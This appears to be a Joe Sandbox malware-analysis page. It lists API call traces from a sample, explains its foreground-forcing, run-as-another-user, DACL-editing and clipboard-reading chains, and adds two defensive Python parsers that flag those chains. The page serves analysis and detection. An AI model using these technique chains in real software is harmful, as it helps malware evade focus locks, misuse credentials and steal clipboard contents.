• AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 00B3FD22
• SetForegroundWindow.USER32(00000000), ref: 00B3FD25
• MapVirtualKeyW.USER32(00000012,00000000), ref: 00B3FD3A
• keybd_event.USER32(00000012,00000000), ref: 00B3FD45
• MapVirtualKeyW.USER32(00000012,00000000), ref: 00B3FD4F
• keybd_event.USER32(00000012,00000000), ref: 00B3FD54
• MapVirtualKeyW.USER32(00000012,00000000), ref: 00B3FD5D
• keybd_event.USER32(00000012,00000000), ref: 00B3FD62
• MapVirtualKeyW.USER32(00000012,00000000), ref: 00B3FD6C
• keybd_event.USER32(00000012,00000000), ref: 00B3FD71
• SetForegroundWindow.USER32(00000000), ref: 00B3FD74
• AttachThreadInput.USER32(?,000000FF,00000000), ref: 00B3FD9B
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
• String ID: Shell_TrayWnd
• API String ID: 4125248594-2988720461
• Opcode ID: a8c567f9c0185c03bddad875173d3e7442fca16020068a92c07a43f950a105e4
• Instruction ID: 627d8b3b29bdf081b4ae0d499e10b5d3340f54bced23a471441561d02b769007
• Opcode Fuzzy Hash: a8c567f9c0185c03bddad875173d3e7442fca16020068a92c07a43f950a105e4
• Instruction Fuzzy Hash: 0C312171A802187FEB216BA55C49F7E7EBCEF44B90F100069FA05FB1D1DAB05D40AAA0
APIs
  • Part of subcall function 00B42010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00B4205A
  • Part of subcall function 00B42010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00B42087
  • Part of subcall function 00B42010: GetLastError.KERNEL32 ref: 00B42097
• LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00B41BD2
• DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00B41BF4
• CloseHandle.KERNEL32(?), ref: 00B41C05
• OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00B41C1D
• GetProcessWindowStation.USER32 ref: 00B41C36
• SetProcessWindowStation.USER32(00000000), ref: 00B41C40
• OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00B41C5C
  • Part of subcall function 00B41A0B: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00B41B48), ref: 00B41A20
  • Part of subcall function 00B41A0B: CloseHandle.KERNEL32(?,?,00B41B48), ref: 00B41A35
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
• String ID: $default$winsta0
• API String ID: 22674027-1027155976
• Opcode ID: fd81ec59d2829d17ca7f4bf67bc442ec2aabe46d210958fb71396ef6417d2371
• Instruction ID: 4f541d9b971d66bcc554260d685bfa3b08a10edfdd5e07b395816f893b3d6764
• Opcode Fuzzy Hash: fd81ec59d2829d17ca7f4bf67bc442ec2aabe46d210958fb71396ef6417d2371
• Instruction Fuzzy Hash: E6815AB1D00209ABDF119FA8DC49FEE7BF8EF04340F1444A9F915A62A0DB718A85DB64
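The two listings above are worth reading as chains rather than as individual calls. The first one is the standard way to defeat the foreground lock: a background process cannot normally call SetForegroundWindow successfully, so the code locates the taskbar (FindWindowW on Shell_TrayWnd), attaches its input queue to the foreground thread with AttachThreadInput, injects synthetic Alt presses (keybd_event with virtual key 0x12, VK_MENU) so the system treats it as having received the last input, and only then calls SetForegroundWindow. The second one is the preparation for running a process under another account: LogonUserW, DuplicateTokenEx with SecurityImpersonation (2) and TokenPrimary (1), then winsta0 and the default desktop opened with access masks 0x60000 and 0x60081, both of which include READ_CONTROL and WRITE_DAC, the rights needed to add an ACE for the new user's SID. The triage helper below is added example code written for this page, not part of the Joe Sandbox report or of the sample: it parses lines in the report's "• Api.MODULE(args), ref: addr" format and flags those chains. The rule names, the chain definitions and the two embedded sample listings (copied from the report lines above, trimmed) are this example's own.

```python
"""Added triage helper for Joe Sandbox per-function API listings.

Example code written for this page, not part of the Joe Sandbox report.
It parses the report's "• Api.MODULE(args), ref: addr" lines and flags
the API chains that the report's signatures describe (foreground forcing,
launching a process as another user, editing a window-station DACL).
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class ApiCall:
    api: str                # e.g. "AttachThreadInput"
    module: str             # e.g. "USER32"
    args: tuple             # arguments exactly as the report prints them
    ref: str                # call-site address
    subcall: Optional[str]  # callee address when marked "Part of subcall function"


# Matches "• Api.MOD(args), ref: ADDR" and the parenthesis-free
# "• Api.MOD ref: ADDR" form the report uses for zero-argument calls.
_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


def parse_api_listing(text: str) -> list[ApiCall]:
    """Return the API calls of one function's listing; headers are skipped."""
    calls = []
    for line in text.splitlines():
        m = _LINE.match(line)
        if not m:
            continue
        args = tuple(a.strip() for a in (m["args"] or "").split(",") if a.strip())
        calls.append(ApiCall(m["api"], m["mod"], args, m["ref"].upper(), m["sub"]))
    return calls


def _hex(arg: str) -> Optional[int]:
    """Decode a printed argument; '?' (unresolved) and string literals give None."""
    try:
        return int(arg, 16)
    except ValueError:
        return None


# Every API named in a rule must appear in the listing (subcalls included).
# Rule names are this example's own; API names are Win32 exports as printed.
CHAINS = {
    "foreground-forcing": {"AttachThreadInput", "keybd_event", "SetForegroundWindow"},
    "launch-as-other-user": {"LogonUserW", "DuplicateTokenEx",
                             "OpenWindowStationW", "OpenDesktopW"},
    "adjust-token-privileges": {"LookupPrivilegeValueW", "AdjustTokenPrivileges"},
    "winsta-desktop-dacl-edit": {"GetUserObjectSecurity",
                                 "GetSecurityDescriptorDacl", "AddAce"},
}

VK_MENU = 0x12          # virtual-key code of Alt
WRITE_DAC = 0x00040000  # standard access right needed to modify a DACL


def match_chains(calls: list[ApiCall]) -> list[str]:
    present = {c.api for c in calls}
    return [name for name, needed in CHAINS.items() if needed <= present]


def alt_key_injections(calls: list[ApiCall]) -> int:
    """Count keybd_event calls whose first argument is VK_MENU (Alt)."""
    return sum(1 for c in calls
               if c.api == "keybd_event" and c.args and _hex(c.args[0]) == VK_MENU)


def requests_write_dac(calls: list[ApiCall]) -> bool:
    """True if winsta0 or a desktop is opened with WRITE_DAC in its access mask."""
    for c in calls:
        if c.api in ("OpenWindowStationW", "OpenDesktopW") and c.args:
            mask = _hex(c.args[-1])
            if mask is not None and mask & WRITE_DAC:
                return True
    return False


# Constructed sample input: trimmed copies of the two listings above.
SAMPLE_FOREGROUND = """APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00B3FCB8
• GetCurrentThreadId.KERNEL32 ref: 00B3FCF5
• AttachThreadInput.USER32(?,00000000,00000001), ref: 00B3FD12
• MapVirtualKeyW.USER32(00000012,00000000), ref: 00B3FD3A
• keybd_event.USER32(00000012,00000000), ref: 00B3FD45
• keybd_event.USER32(00000012,00000000), ref: 00B3FD54
• keybd_event.USER32(00000012,00000000), ref: 00B3FD62
• keybd_event.USER32(00000012,00000000), ref: 00B3FD71
• SetForegroundWindow.USER32(00000000), ref: 00B3FD74
• AttachThreadInput.USER32(?,000000FF,00000000), ref: 00B3FD9B
Strings
"""

SAMPLE_LOGON = """APIs
  • Part of subcall function 00B42010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00B4205A
  • Part of subcall function 00B42010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00B42087
  • Part of subcall function 00B42010: GetLastError.KERNEL32 ref: 00B42097
• LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00B41BD2
• DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00B41BF4
• OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00B41C1D
• OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00B41C5C
"""

if __name__ == "__main__":
    for name, text in (("foreground", SAMPLE_FOREGROUND), ("logon", SAMPLE_LOGON)):
        calls = parse_api_listing(text)
        print(name, len(calls), "calls", match_chains(calls),
              "alt presses:", alt_key_injections(calls),
              "WRITE_DAC:", requests_write_dac(calls))
```

The rules match on sets of exported names, so a listing that uses the ANSI variants (LogonUserA, OpenDesktopA) would need those added; the point of keeping them as plain sets is that each rule reads like the report's own signature line and can be extended without touching the parser. The DACL-edit rule is satisfied by the fourth listing below once its subcall lines are included, which is why the parser keeps "Part of subcall function" entries instead of dropping them.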
APIs
  • Part of subcall function 00B41A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00B41A60
  • Part of subcall function 00B41A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,00B414E7,?,?,?), ref: 00B41A6C
  • Part of subcall function 00B41A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00B414E7,?,?,?), ref: 00B41A7B
  • Part of subcall function 00B41A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00B414E7,?,?,?), ref: 00B41A82
  • Part of subcall function 00B41A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00B41A99
• GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00B41518
• GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00B4154C
• GetLengthSid.ADVAPI32(?), ref: 00B41563
• GetAce.ADVAPI32(?,00000000,?), ref: 00B4159D
• AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00B415B9
• GetLengthSid.ADVAPI32(?), ref: 00B415D0
• GetProcessHeap.KERNEL32(00000008,00000008), ref: 00B415D8
• HeapAlloc.KERNEL32(00000000), ref: 00B415DF
• GetLengthSid.ADVAPI32(?,00000008,?), ref: 00B41600
• CopySid.ADVAPI32(00000000), ref: 00B41607
                                                                                                                                                                                                                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00B41636
                                                                                                                                                                                                                                                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00B41658
                                                                                                                                                                                                                                                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00B4166A
                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B41691
                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00B41698
                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B416A1
                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00B416A8
                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B416B1
                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00B416B8
                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00B416C4
                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00B416CB
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B41ADF: GetProcessHeap.KERNEL32(00000008,00B414FD,?,00000000,?,00B414FD,?), ref: 00B41AED
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B41ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,00B414FD,?), ref: 00B41AF4
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B41ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00B414FD,?), ref: 00B41B03
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 4175595110-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 7ba670d4e65bb924e89b687258bd147d8b49dddc2c1bedcd1cd57a6420861c6a
                                                                                                                                                                                                                                                                                    • Instruction ID: 3ddddd708d3b6047f5030db1a88b6ce8c5891303e67d89859d562d931d6d32b8
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7ba670d4e65bb924e89b687258bd147d8b49dddc2c1bedcd1cd57a6420861c6a
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 28714CB2D00209ABDF109FA9DC44FEEBBB8FF04350F194955E919A7190DB31DA85DBA0
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • OpenClipboard.USER32(00B7DCD0), ref: 00B5F586
                                                                                                                                                                                                                                                                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 00B5F594
                                                                                                                                                                                                                                                                                    • GetClipboardData.USER32(0000000D), ref: 00B5F5A0
                                                                                                                                                                                                                                                                                    • CloseClipboard.USER32 ref: 00B5F5AC
                                                                                                                                                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00B5F5E4
                                                                                                                                                                                                                                                                                    • CloseClipboard.USER32 ref: 00B5F5EE
                                                                                                                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00B5F619
                                                                                                                                                                                                                                                                                    • IsClipboardFormatAvailable.USER32(00000001), ref: 00B5F626
                                                                                                                                                                                                                                                                                    • GetClipboardData.USER32(00000001), ref: 00B5F62E
                                                                                                                                                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00B5F63F
                                                                                                                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00B5F67F
                                                                                                                                                                                                                                                                                    • IsClipboardFormatAvailable.USER32(0000000F), ref: 00B5F695
                                                                                                                                                                                                                                                                                    • GetClipboardData.USER32(0000000F), ref: 00B5F6A1
                                                                                                                                                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00B5F6B2
                                                                                                                                                                                                                                                                                    • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00B5F6D4
                                                                                                                                                                                                                                                                                    • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00B5F6F1
                                                                                                                                                                                                                                                                                    • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00B5F72F
                                                                                                                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00B5F750
                                                                                                                                                                                                                                                                                    • CountClipboardFormats.USER32 ref: 00B5F771
                                                                                                                                                                                                                                                                                    • CloseClipboard.USER32 ref: 00B5F7B6
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 420908878-0
                                                                                                                                                                                                                                                                                    • Opcode ID: c0a1ef4ba9ddfa1af3e2bcaa8d5811b659fc853f8bba3f4a83d604d660246f3a
                                                                                                                                                                                                                                                                                    • Instruction ID: f6f06838bbe4375ee225504d08a18c6b6a99b14d7c2072751796de03dc46dedc
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c0a1ef4ba9ddfa1af3e2bcaa8d5811b659fc853f8bba3f4a83d604d660246f3a
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6C618D312042429FD300EF20D888F6AB7F4EF98785F1445A9F94A872A2DF71ED49DB61
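The two API traces above read as raw call lists, but each one is a recognisable Win32 pattern: the first is the read-modify-write of a window-station/desktop DACL (GetUserObjectSecurity with DACL_SECURITY_INFORMATION, AddAce, SetUserObjectSecurity) that a process performs to grant another account access before launching a process as that account; the second requests clipboard formats 0xD, 0x1 and 0xF, which are CF_UNICODETEXT, CF_TEXT and CF_HDROP, so the sample reads clipboard text and the paths of copied files (DragQueryFileW walks the CF_HDROP list). The following is an added analyst-side example, not Joe Sandbox code and not code from the sample: it parses trace lines in the format printed on this page, decodes the clipboard-format constants, and checks for the DACL-grant sequence. The sample trace embedded in it is constructed from the lines listed above; the format-name table and the DACL_SECURITY_INFORMATION value are standard Win32 constants, and the function names are the example's own.

```python
"""Parse Joe Sandbox IDA-plugin API trace lines and flag two stealer behaviours."""
import re
from typing import Dict, List, NamedTuple, Optional, Tuple

# Constructed sample trace, copied from the call lists printed on this page.
SAMPLE_TRACE = """\
• OpenClipboard.USER32(00B7DCD0), ref: 00B5F586
• IsClipboardFormatAvailable.USER32(0000000D), ref: 00B5F594
• GetClipboardData.USER32(0000000D), ref: 00B5F5A0
• IsClipboardFormatAvailable.USER32(00000001), ref: 00B5F626
• GetClipboardData.USER32(00000001), ref: 00B5F62E
• IsClipboardFormatAvailable.USER32(0000000F), ref: 00B5F695
• GetClipboardData.USER32(0000000F), ref: 00B5F6A1
• DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00B5F6D4
• CloseClipboard.USER32 ref: 00B5F7B6
  • Part of subcall function 00B41A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00B41A99
• GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00B41518
• AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00B415B9
• SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00B41658
• SetUserObjectSecurity.USER32(?,00000004,?), ref: 00B4166A
"""

# Standard clipboard format identifiers (winuser.h).
CLIPBOARD_FORMATS = {1: "CF_TEXT", 2: "CF_BITMAP", 7: "CF_OEMTEXT", 8: "CF_DIB",
                     13: "CF_UNICODETEXT", 15: "CF_HDROP", 17: "CF_DIBV5"}
DACL_SECURITY_INFORMATION = 0x4   # SECURITY_INFORMATION flag (winnt.h)


class Call(NamedTuple):
    api: str
    module: str
    args: Tuple[Optional[int], ...]   # None where the sandbox printed '?'
    ref: int                          # address of the call instruction
    subcall_of: Optional[int]         # parent when "Part of subcall function"


# Matches "• Api.MODULE(args), ref: ADDR", "• Api.MODULE ref: ADDR" and the
# indented "Part of subcall function X:" variant; headers do not match.
_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")


def _parse_arg(tok: str) -> Optional[int]:
    tok = tok.strip()
    return None if tok == "?" else int(tok, 16)


def parse_trace(text: str) -> List[Call]:
    """Turn the report's bullet lines into Call records; non-call lines are skipped."""
    calls: List[Call] = []
    for line in text.splitlines():
        m = _LINE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = tuple(_parse_arg(a) for a in raw.split(",")) if raw else ()
        sub = int(m.group("sub"), 16) if m.group("sub") else None
        calls.append(Call(m.group("api"), m.group("mod"), args,
                          int(m.group("ref"), 16), sub))
    return calls


def clipboard_formats(calls: List[Call]) -> List[str]:
    """Formats the code actually reads (GetClipboardData), in call order."""
    names = []
    for c in calls:
        if c.api == "GetClipboardData" and c.args and c.args[0] is not None:
            names.append(CLIPBOARD_FORMATS.get(c.args[0], f"format_{c.args[0]:#x}"))
    return names


def has_user_object_dacl_grant(calls: List[Call]) -> bool:
    """Read of a user-object DACL, an ACE appended, then the DACL written back."""
    apis = [c.api for c in calls]
    if not all(a in apis for a in ("GetUserObjectSecurity", "AddAce", "SetUserObjectSecurity")):
        return False
    rd, wr = apis.index("GetUserObjectSecurity"), apis.index("SetUserObjectSecurity")
    if rd > wr or not (rd < apis.index("AddAce") < wr):
        return False
    for i in (rd, wr):                      # both must target the DACL when the flag is known
        a = calls[i].args
        if len(a) > 1 and a[1] is not None and not (a[1] & DACL_SECURITY_INFORMATION):
            return False
    return True


def summarize(text: str) -> Dict[str, object]:
    calls = parse_trace(text)
    return {
        "calls": len(calls),
        "clipboard_formats": clipboard_formats(calls),
        "reads_copied_file_paths": any(c.api == "DragQueryFileW" for c in calls),
        "user_object_dacl_grant": has_user_object_dacl_grant(calls),
    }


if __name__ == "__main__":
    print(summarize(SAMPLE_TRACE))
```

The parser is deliberately tolerant of the two line shapes the report prints (with and without an argument list) so it can be pointed at a whole exported function list; only GetClipboardData, not IsClipboardFormatAvailable, counts as a read, since the latter only probes.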
APIs
• FindFirstFileW.KERNEL32(?,?), ref: 00B57403
• FindClose.KERNEL32(00000000), ref: 00B57457
• FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00B57493
• FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00B574BA
  • Part of subcall function 00AEB329: _wcslen.LIBCMT ref: 00AEB333
• FileTimeToSystemTime.KERNEL32(?,?), ref: 00B574F7
• FileTimeToSystemTime.KERNEL32(?,?), ref: 00B57524
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
• String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
• API String ID: 3830820486-3289030164
• Opcode ID: d6ed08b74dd5ffab8062550883184a3782b2de181fa91ee393930fb83fe6c0c3
• Instruction ID: e6dfafce92e510a9107cb915b609938a3df1614b0bd3ce4029e6002a8eb5c95f
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d6ed08b74dd5ffab8062550883184a3782b2de181fa91ee393930fb83fe6c0c3
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EFD15E72508344AEC300EB65C985EBBB7ECEF98704F400959F589D7252EB74DA48C762
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00B5A0A8
                                                                                                                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 00B5A0E6
                                                                                                                                                                                                                                                                                    • SetFileAttributesW.KERNEL32(?,?), ref: 00B5A100
                                                                                                                                                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00B5A118
                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00B5A123
                                                                                                                                                                                                                                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00B5A13F
                                                                                                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00B5A18F
                                                                                                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(00BA7B94), ref: 00B5A1AD
                                                                                                                                                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00B5A1B7
                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00B5A1C4
                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00B5A1D4
                                                                                                                                                                                                                                                                                    Strings
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
• String ID: *.*
• API String ID: 1409584000-438819550
• Opcode ID: 4afc64666100ba3d5df549e0df7a1314afa1b245186ac3654c64200f7f9db063
• Instruction ID: 0a7c4cc73d5139704d15063fe571e39858b3bdf5f002f611f4abeda38412eecb
• Opcode Fuzzy Hash: 4afc64666100ba3d5df549e0df7a1314afa1b245186ac3654c64200f7f9db063
• Instruction Fuzzy Hash: 0E31E2326046096BDB20AFB4DC49BDE77ECDF06361F0006D5EC18F30A0EB70DA898A65
APIs
• GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00B54785
• _wcslen.LIBCMT ref: 00B547B2
• CreateDirectoryW.KERNEL32(?,00000000), ref: 00B547E2
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00B54803
• RemoveDirectoryW.KERNEL32(?), ref: 00B54813
• DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00B5489A
• CloseHandle.KERNEL32(00000000), ref: 00B548A5
• CloseHandle.KERNEL32(00000000), ref: 00B548B0
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
